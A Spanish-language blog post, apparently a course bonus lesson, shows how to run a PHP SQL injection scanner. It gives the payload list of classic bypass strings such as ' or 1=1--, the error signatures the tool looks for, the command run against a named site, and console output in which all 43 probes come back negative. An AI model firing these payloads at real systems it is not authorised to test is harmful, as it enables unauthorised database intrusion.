Sql Injection Tool - Bonus Topic

 Buenas.. este tema es un bonus en el curso dado que aun no hacemos sql injection, pero aqui esta..

Como usarlo.. dado que es un script CLI. en la consola ejecutamos

1. Rellenamos el archivo de inyecciones

Ejemplo.
tail -f sqli_dorks.txt
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
agregue mas inyecciones en este archivo , una por linea.

2. Rellenamos el archivo de errores.

Ejemplo
tail -f sqli_errors.txt
error mysql_error
mysql_error
Warning
mysql_fetch_array()
supplied argument
You have an error in your SQL syntax;
agregue mas errores  en este archivo , uno por linea.

3. Ejecutamos el script de sql injection discover

php gsi0.com_sqli_injection_discover.php -isqli_dorks.txt -esqli_errors.txt -t"www.jamesjara.com/?articuloid=123{inyectme}&foo=bar"

Resultado:
 [[email protected] sql-injection]# php gsi0.com_sqli_injection_discover.php -isqli_dorks.txt -esqli_errors.txt -t"www.jamesjara.com/?articuloid=123{inyectme}&foo=ba"
==== welcome gsi0.com ARMY by @jamesjara , wait.. the pentesting is starting...
<><><> - - Executing new dork #0 - [admin'--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #1 - [' or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #2 - ['" or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #3 - [' union select 1, 'Eyeless', 'ez2do', 1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #4 - [admin'--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #5 - [administrator'--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #6 - [superuser'--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #7 - [test'--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #8 - [' or 0=0 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #9 - [' or 0=0 --']
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #10 - [' or 0=0 #]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #11 - [" or 0=0 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #12 - [" or 0=0 --']
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #13 - ['" or 0=0 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #14 - [or 0=0 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #15 - [' or 0=0 #]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #16 - [" or 0=0 #]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #17 - [or 0=0 #]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #18 - [' or 'x'='x]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #19 - [" or "x"="x]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #20 - [') or ('x'='x]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #21 - [" or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #22 - [or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #23 - [' or a=a--']
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #24 - [' or a=a #]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #25 - [' or a=a--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #26 - [' or "a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #27 - [' or 'a'='a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #28 - [" or "a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #29 - [') or ('a'='a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #30 - [") or ("a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #31 - [hi" or "a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #32 - [hi" or 1=1 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #33 - [hi' or 1=1 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #34 - [hi' or 'a'='a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #35 - [hi') or ('a'='a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #36 - [hi") or ("a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #37 - [' or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #38 - [" or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #39 - [or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #40 - [' or 'a'='a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #41 - [" or "a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #42 - [') or ('a'='a]
<><><><><> - - - - - Result: negative
========================================
==== #0 injections founded ...
==== welcome gsi0.com ARMY by @jamesjara , pentesting FINISHED ,check results.txt ...






 Bueno, gracias por su tiempo

-- James jara, @jamesjara



0 pensamientos:

Post a Comment

feedback!